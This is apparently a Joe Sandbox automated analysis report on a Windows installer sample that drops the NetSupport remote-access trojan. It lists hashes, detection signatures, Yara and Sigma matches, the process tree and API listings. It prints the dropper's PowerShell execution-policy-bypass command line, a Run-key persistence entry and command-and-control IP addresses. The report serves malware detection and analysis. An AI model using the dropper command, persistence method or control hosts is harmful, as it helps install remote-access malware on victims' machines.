Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KC0uZWwr8p.exe

Overview

General Information

Sample name:KC0uZWwr8p.exe
renamed because original name is a hash value
Original sample name:7b6e6212a6d13800282bd2cb362c2a311d89e543.exe
Analysis ID:1552424
MD5:3c387c0db035c0c3185d6fbd1ab46bd1
SHA1:7b6e6212a6d13800282bd2cb362c2a311d89e543
SHA256:a1720d68eef7dc381a533fd8584a227db3dbcaed16098a0d7f31077f95355e8c
Tags:exeNetworkUtilityProOMICAREJOINTSTOCKCOMPANYuser-NDA0E
Infos:

Detection

NetSupport RAT, NetSupport Downloader
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected Advanced IP Scanner Hacktool
Yara detected NetSupport Downloader
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

Process Tree

  • System is w10x64
  • KC0uZWwr8p.exe (PID: 2800 cmdline: "C:\Users\user\Desktop\KC0uZWwr8p.exe" MD5: 3C387C0DB035C0C3185D6FBD1AB46BD1)
    • KC0uZWwr8p.tmp (PID: 1448 cmdline: "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" MD5: 77264DBCB409DE0C426BD5088B0FBE09)
      • powershell.exe (PID: 5448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • client32.exe (PID: 4008 cmdline: "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 2004 cmdline: "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 7072 cmdline: "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\SystemUtil\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 6 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000007.00000000.1905886353.0000000000404000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              0000000A.00000002.2115416028.0000000000404000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000007.00000002.4094673945.0000000000404000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 22 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      8.2.client32.exe.6db60000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        10.2.client32.exe.6db60000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          8.0.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            8.2.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              7.0.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 20 entries

                                Other

                                SourceRuleDescriptionAuthorStrings
                                amsi32_5448.amsi.csvJoeSecurity_NetSupportDownloaderYara detected NetSupport DownloaderJoe Security
                                  amsi32_5448.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                                  • 0x2e4f73:$b1: ::WriteAllBytes(
                                  • 0x2e4f3f:$b2: ::FromBase64String(
                                  • 0x2f16ec:$s1: -join
                                  • 0x2eae98:$s4: +=
                                  • 0x2eaf5a:$s4: +=
                                  • 0x2ef181:$s4: +=
                                  • 0x2f129e:$s4: +=
                                  • 0x2f1588:$s4: +=
                                  • 0x2f16ce:$s4: +=
                                  • 0x2f4ee4:$s4: +=
                                  • 0x2f4fe8:$s4: +=
                                  • 0x2f8444:$s4: +=
                                  • 0x2f8b24:$s4: +=
                                  • 0x2f8fda:$s4: +=
                                  • 0x2f902f:$s4: +=
                                  • 0x2f92a3:$s4: +=
                                  • 0x2f92d2:$s4: +=
                                  • 0x2f981a:$s4: +=
                                  • 0x2f9849:$s4: +=
                                  • 0x2f9928:$s4: +=
                                  • 0x2fbbbf:$s4: +=

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: Script Interpreter Execution From Suspicious Folder
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp, ParentProcessId: 1448, ParentProcessName: KC0uZWwr8p.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", ProcessId: 5448, ProcessName: powershell.exe
                                  Sigma detected: Suspicious Script Execution From Temp Folder
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp, ParentProcessId: 1448, ParentProcessName: KC0uZWwr8p.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", ProcessId: 5448, ProcessName: powershell.exe
                                  Sigma detected: Change PowerShell Policies to an Insecure Level
                                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp, ParentProcessId: 1448, ParentProcessName: KC0uZWwr8p.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", ProcessId: 5448, ProcessName: powershell.exe
                                  Sigma detected: CurrentVersion Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5448, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp
                                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5448, TargetFilename: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll
                                  Sigma detected: Non Interactive PowerShell Process Spawned
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp, ParentProcessId: 1448, ParentProcessName: KC0uZWwr8p.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", ProcessId: 5448, ProcessName: powershell.exe

                                  Remote Access Functionality

                                  barindex
                                  Sigma detected: Powershell drops NetSupport RAT client
                                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5448, TargetFilename: C:\Users\user\AppData\Roaming\SystemUtil\NSM.LIC

                                  Suricata Signatures

                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-11-08T19:02:17.851088+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449733TCP
                                  2024-11-08T19:02:56.688621+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449744TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-11-08T19:01:53.533170+010028277451Malware Command and Control Activity Detected192.168.2.449740199.188.200.195443TCP
                                  2024-11-08T19:01:53.533170+010028277451Malware Command and Control Activity Detected192.168.2.449739151.236.16.15443TCP

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Multi AV Scanner detection for submitted file
                                  Source: KC0uZWwr8p.exeReversingLabs: Detection: 18%
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,7_2_110AC820
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,8_2_110AC820
                                  Source: KC0uZWwr8p.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dllJump to behavior
                                  Source: KC0uZWwr8p.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.4097717699.000000006DB62000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.2035313904.000000006DB62000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2122570956.000000006DB62000.00000002.00000001.01000000.0000000C.sdmp
                                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: is-5C3J6.tmp.1.dr
                                  Source: Binary string: S:\src\Other\openssl_current\BuildOpenSSL\tmp\src_x86_dynamic_release\out32dll\libeay32.pdba source: is-BPHN2.tmp.1.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdb source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: C:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5WinExtras.pdb00 source: is-Q62S4.tmp.1.dr
                                  Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: is-RT7U6.tmp.1.dr
                                  Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Xml.pdb source: is-0LL3Q.tmp.1.dr
                                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: is-MR0EO.tmp.1.dr
                                  Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000008.00000002.2035069652.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2120902471.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, msvcr100.dll.3.dr
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdb source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Widgets.pdb source: is-MH1O8.tmp.1.dr
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdbss' source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1945716217.0000000007043000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb"" source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: is-FLT6F.tmp.1.dr
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Xml.pdb source: is-0LL3Q.tmp.1.dr
                                  Source: Binary string: client32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr
                                  Source: Binary string: S:\src\Other\openssl_current\BuildOpenSSL\tmp\src_x86_dynamic_release\out32dll\libeay32.pdb source: is-BPHN2.tmp.1.dr
                                  Source: Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdbt3 source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: C:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5WinExtras.pdb source: is-Q62S4.tmp.1.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.4097611987.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000008.00000002.2035242629.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2122115780.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, pcicapi.dll.3.dr
                                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: is-AQQBN.tmp.1.dr
                                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: is-5KHP2.tmp.1.dr
                                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: is-L4L9S.tmp.1.dr

                                  Spreading

                                  barindex
                                  Yara detected Advanced IP Scanner Hacktool
                                  Source: Yara matchFile source: C:\Program Files (x86)\Advanced IP Scanner\is-F5QT3.tmp, type: DROPPED
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,7_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,7_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_6882CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,7_2_6882CA9B
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_68830B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_68830B33
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,8_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,8_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,8_2_1110BB80
